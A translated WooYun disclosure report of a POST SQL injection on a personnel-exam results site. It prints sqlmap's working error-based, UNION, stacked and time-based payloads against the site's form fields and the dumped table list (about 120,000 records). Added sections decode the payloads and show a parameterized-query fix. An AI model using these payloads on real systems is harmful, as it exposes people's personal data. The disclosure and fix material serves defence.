WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-01-13: Details reported to the vendor; waiting for the vendor to handle it
2016-01-15: Vendor confirmed; details disclosed to the vendor only
2016-01-25: Details disclosed to core white hats and experts in the relevant field
2016-02-04: Details disclosed to regular white hats
2016-02-14: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public
POST-type SQL injection on a personnel examination site leaks 120,000 records
The input filtering is done in JS, so put the request through Burp to test it.
It threw an error, so I put the captured request into sqlmap.
Place: POST
Parameter: xmtxt
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' AND 5271=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (5271=5271) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58))) AND 'bbYT'='bbYT&zjlx=0&sfzhtxt=111111111111111&Button1=查询

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' UNION ALL SELECT CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)+CHAR(74)+CHAR(109)+CHAR(69)+CHAR(108)+CHAR(70)+CHAR(71)+CHAR(78)+CHAR(118)+CHAR(114)+CHAR(79)+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58)-- &zjlx=0&sfzhtxt=111111111111111&Button1=查询

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����'; WAITFOR DELAY '0:0:5';--&zjlx=0&sfzhtxt=111111111111111&Button1=查询

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTgyMzEzMDE5OQ9kFgICAQ9kFgICCQ8PZBYCHgdvbmNsaWNrBRJyZXR1cm4gdmFsaWRhdGUoKTtkZN+23P4k3B2YgAQNre0Fpc5F0S48&__EVENTVALIDATION=/wEWBgLPr47SAQKA/pb9DALkoJyyDgL7oJyyDgKBqsfcCgKM54rGBtt8UhLyLVBqgk+819MY6o+2vcz1&xmtxt=����' WAITFOR DELAY '0:0:5'--&zjlx=0&sfzhtxt=111111111111111&Button1=查询
---
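The error-based and UNION payloads above look opaque because sqlmap builds its strings from CHAR() calls so that no quote characters appear in the injected value. The trick behind the error-based one is CONVERT(INT, <string>): SQL Server cannot convert a non-numeric string and its error message quotes the offending value, so whatever sqlmap wraps between its markers (:bvi: ... :acm:) comes back in the error text. The following is an added example, not part of the original report, that decodes the two xmtxt payloads and then reads the leaked value out of constructed responses (the error message follows SQL Server's wording; the page cell is made up):

```python
import re
from typing import Optional

# The two xmtxt payloads from the sqlmap output, with the other POST fields and
# the undecodable name bytes left out.
ERROR_BASED_PAYLOAD = (
    "' AND 5271=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)"
    "+(SELECT (CASE WHEN (5271=5271) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58))) AND 'bbYT'='bbYT"
)
UNION_PAYLOAD = (
    "' UNION ALL SELECT CHAR(58)+CHAR(98)+CHAR(118)+CHAR(105)+CHAR(58)"
    "+CHAR(74)+CHAR(109)+CHAR(69)+CHAR(108)+CHAR(70)+CHAR(71)+CHAR(78)"
    "+CHAR(118)+CHAR(114)+CHAR(79)+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(109)+CHAR(58)-- "
)

# Constructed responses (not captured from the site). The first has the shape
# of the SQL Server error that CONVERT(INT, <non-numeric string>) raises; the
# second is a page cell that echoed the UNION row back.
ERROR_RESPONSE = (
    "Conversion failed when converting the varchar value ':bvi:1:acm:' "
    "to data type int."
)
UNION_RESPONSE = "<td>:bvi:JmElFGNvrO:acm:</td>"

# A run of T-SQL CHAR(n) calls joined with '+', e.g. CHAR(58)+CHAR(98)+CHAR(118)
CHAR_RUN = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*")
# sqlmap's three-letter markers, e.g. :bvi: ... :acm:
MARKER = re.compile(r":([a-z]{3}):")


def decode_char_runs(sql: str) -> str:
    """Rewrite every CHAR(n)+CHAR(n)+... run as the quoted string it evaluates to."""
    def to_literal(match) -> str:
        codes = re.findall(r"CHAR\((\d+)\)", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_RUN.sub(to_literal, sql)


def find_markers(payload: str) -> tuple:
    """Return the (opening, closing) marker strings the payload wraps its result in."""
    names = MARKER.findall(decode_char_runs(payload))
    return ":%s:" % names[0], ":%s:" % names[-1]


def extract_between_markers(response: str, open_marker: str, close_marker: str) -> Optional[str]:
    """Pull the value sitting between the markers out of a response or error text."""
    pattern = re.escape(open_marker) + r"(.*?)" + re.escape(close_marker)
    found = re.search(pattern, response, re.S)
    return found.group(1) if found else None


def extract_result(payload: str, response: str) -> Optional[str]:
    """Decode the payload's markers, then read the leaked value from the response."""
    open_marker, close_marker = find_markers(payload)
    return extract_between_markers(response, open_marker, close_marker)


if __name__ == "__main__":
    for label, payload, response in (
        ("error-based", ERROR_BASED_PAYLOAD, ERROR_RESPONSE),
        ("UNION", UNION_PAYLOAD, UNION_RESPONSE),
    ):
        print(label, "injects:", decode_char_runs(payload))
        print(label, "leaks:  ", extract_result(payload, response))
```

Decoded, the error-based payload tests a condition (5271=5271, later replaced by a substring comparison against table data) and converts ':bvi:' + '1' or '0' + ':acm:' to INT; the UNION payload selects the literal ':bvi:JmElFGNvrO:acm:' so sqlmap can locate its own column in the page. That is why a verbose database error reaching the browser turns a blind injection into a fast one.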
Forgot to take a screenshot at the time =-=
Database: chinaexamcj
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| dbo.dhjm1                 | 121137  |
| dbo.dh0609                | 119579  |
| dbo.mm                    | 119541  |
| dbo.dhjm                  | 86390   |
| dbo.dh0608                | 14774   |
| dbo.dh0607                | 12176   |
| dbo.ly_view_gwyResult     | 4410    |
| dbo.ly_view_codeitem      | 2443    |
| dbo.SR_CodeItem           | 2440    |
| dbo.ly_view_codeitemPre   | 2397    |
| dbo.web_Gwy_ZwZy          | 2395    |
| dbo.ly_view_codeitem2     | 2363    |
| dbo.web_GWY_Extra         | 2205    |
| dbo.dhbz                  | 1944    |
| dbo.kd05                  | 1200    |
| dbo.cj01201409            | 703     |
| dbo.cj02201505            | 500     |
| dbo.SM_Log                | 286     |
| dbo.SR_BuiltItem          | 125     |
| dbo.web_SR_ExamCode       | 117     |
| dbo.SR_SourceItem         | 107     |
| dbo.ly_sr_viewBItemt      | 98      |
| dbo.ly_sr_viewBItem       | 89      |
| dbo.ly_sr_viewBItem_old   | 89      |
| dbo.web_SR_CodeItem       | 86      |
| dbo.ly_view_examSys       | 79      |
| dbo.web_tbl_menu          | 71      |
| dbo.Sr_ReLog              | 50      |
| dbo.sr_SDKSAud            | 49      |
| dbo.Sr_WjType             | 48      |
| dbo.web_tbl_log           | 42      |
| dbo.SR_AppModal           | 41      |
| dbo.sr_map                | 41      |
| dbo.SR_BmInputSet         | 33      |
| dbo.Sr_NHcode             | 32      |
| dbo.Fld_View              | 25      |
| dbo.web_tbl_ac_power      | 17      |
| dbo.Sr_Nx                 | 16      |
| dbo.WEB_SR_examInfo       | 16      |
| dbo.sr_BuiltExamReg       | 15      |
| dbo.web_tbl_menuFlow      | 13      |
| dbo.Results               | 11      |
| dbo.SR_CodeCollectSys     | 11      |
| dbo.Fld                   | 10      |
| dbo.SR_CodeCollect        | 10      |
| dbo.web_tbl_config_system | 10      |
| dbo.ly_view_menu          | 9       |
| dbo.SR_ExamWork           | 9       |
| dbo.web_tbl_act_system    | 9       |
| dbo.cfl_view_ShenHe       | 8       |
| dbo.web_exam_AudCode      | 8       |
| dbo.Web_KsRegister        | 8       |
| dbo.web_ShenHe            | 8       |
| dbo.dtproperties          | 7       |
| dbo.ly_view_login         | 7       |
| dbo.Prj_Import            | 7       |
| dbo.SR_BuiltCollect       | 7       |
| dbo.SR_RptFldItem         | 7       |
| dbo.SR_SourceCollect      | 7       |
| dbo.web_SR_examList       | 7       |
| dbo.web_sr_report         | 7       |
| dbo.web_tbl_login         | 7       |
| dbo.ly_view_groupTree     | 6       |
| dbo.web_tbl_rule          | 6       |
| dbo.ZwMsYS                | 6       |
| dbo.ly_view_examInfo      | 5       |
| dbo.sr_BuiltExamRegDate   | 5       |
| dbo.Sr_WjDispose          | 5       |
| dbo.EI_ExamTreeDesc       | 4       |
| dbo.ly_view_setTable      | 4       |
| dbo.Web_KsFlow            | 4       |
| dbo.WEB_SR_SetTable       | 4       |
| dbo.WEB_SR_SetTime        | 4       |
| dbo.web_tbl_group         | 4       |
| dbo.AMEDIA01              | 3       |
| dbo.cfl_cjcx_examlist     | 3       |
| dbo.EI_SubjectDesc        | 3       |
| dbo.Hmc_Font              | 3       |
| dbo.ly_view_examDate      | 3       |
| dbo.ly_view_examDate2     | 3       |
| dbo.ly_view_JgBuilt       | 3       |
| dbo.ly_view_srEexamFy     | 3       |
| dbo.SR_CardReprot         | 3       |
| dbo.SR_JgBuilt            | 3       |
| dbo.sr_SjbhGz             | 3       |
| dbo.web_cjcard            | 3       |
| dbo.web_SR_examFY         | 3       |
| dbo.ZwMsSet               | 3       |
| dbo.Kc_TdbGridWidth       | 2       |
| dbo.Sr_ZwAddFs            | 2       |
| dbo.web_cjcx_examlist     | 2       |
| dbo.web_exam_AudFlow      | 2       |
| dbo.web_sr_netPay         | 2       |
| dbo.web_tbl_group_system  | 2       |
| dbo.MQ_VIEW_ExamInf       | 1       |
| dbo.MQ_VIEW_Jg            | 1       |
| dbo.SR_KcTj               | 1       |
| dbo.SR_KcTj1              | 1       |
| dbo.sr_ksList             | 1       |
| dbo.sr_ksListAll          | 1       |
| dbo.Sr_SerialNo           | 1       |
| dbo.SR_SetTime            | 1       |
| dbo.SR_StartExam          | 1       |
| dbo.sysdiagrams           | 1       |
| dbo.TT_Jgkd               | 1       |
| dbo.tt_kdjg               | 1       |
| dbo.TT_KsSj               | 1       |
| dbo.TT_Ksxx               | 1       |
| dbo.TT_Subject            | 1       |
| dbo.TT_Zykm               | 1       |
| dbo.Web_kqzw              | 1       |
+---------------------------+---------+
Admin table: dbo.web_tbl_login
I don't know what encryption it uses; a friend says it is AES or something like that >_<. Backend address: http://**.**.**.**/Manage/Default.aspx. This hole is decent, right? Give a newbie a chance, please approve it!
Fix: stop relying on JS validation. Uh, I don't really understand it either, so that's it.
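The reason "stop relying on JS validation" is the right fix: the browser-side check never sees a request that is sent from Burp, curl or a script, so the server has to re-validate the fields itself and, more importantly, must not splice them into the SQL text at all. The following is an added example, not the site's code, showing the two sides in runnable form. SQLite stands in for SQL Server, the table and column names are assumptions, and the UNION payload is the shape from the sqlmap output adapted to SQLite (a string literal instead of CHAR()+CHAR() concatenation); only the field meanings (xmtxt = name, sfzhtxt = ID number) come from the report:

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the score-lookup table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE results (name TEXT, idno TEXT, score TEXT)")
    conn.executemany(
        "INSERT INTO results VALUES (?, ?, ?)",
        [("Zhang San", "110101199001011234", "88"),
         ("Li Si", "110101199002022345", "91")],
    )
    return conn


# The UNION shape from the sqlmap output, adapted to SQLite. Nothing on the
# client can stop this string from being sent: Burp skips the page's JavaScript.
UNION_PAYLOAD = "' UNION ALL SELECT 'injected'-- "


def lookup_vulnerable(conn: sqlite3.Connection, name: str, idno: str) -> list:
    """What the injection point implies: request fields concatenated into SQL."""
    sql = f"SELECT score FROM results WHERE name = '{name}' AND idno = '{idno}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, name: str, idno: str) -> list:
    """Same query with bound parameters: the input can never become SQL syntax."""
    sql = "SELECT score FROM results WHERE name = ? AND idno = ?"
    return [row[0] for row in conn.execute(sql, (name, idno))]


# Server-side copy of what the JavaScript was checking. Assumed rules: a name of
# 1-30 word characters, spaces or middle dots; a 15-digit or 18-digit PRC ID
# number (sqlmap's own test value, 15 ones, passes the length rule).
NAME_RE = re.compile(r"^[\w· ]{1,30}$")
IDNO_RE = re.compile(r"^(\d{15}|\d{17}[\dXx])$")


def lookup_safe(conn: sqlite3.Connection, name: str, idno: str) -> list:
    """Validate on the server, then query with parameters. Rejects bad input loudly."""
    if not NAME_RE.fullmatch(name) or not IDNO_RE.fullmatch(idno):
        raise ValueError("invalid name or ID number")
    return lookup_parameterized(conn, name, idno)


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:   ", lookup_vulnerable(db, UNION_PAYLOAD, "111111111111111"))
    print("parameterized:", lookup_parameterized(db, UNION_PAYLOAD, "111111111111111"))
    try:
        lookup_safe(db, UNION_PAYLOAD, "111111111111111")
    except ValueError as exc:
        print("safe:         ", exc)
```

The parameterized query alone is what closes the injection; the regex check is defence in depth and gives a clean error instead of a database error page, which matters here because the error-based payload above only works when SQL Server's conversion message reaches the response. Keep the JavaScript for user feedback if you like, but treat it as cosmetic.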
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2016-01-15 15:51
CNVD confirms it did not reproduce the described situation; the case has been passed to CNCERT and sent down to the Shanxi branch center, which will coordinate handling with the website's operating unit.
None yet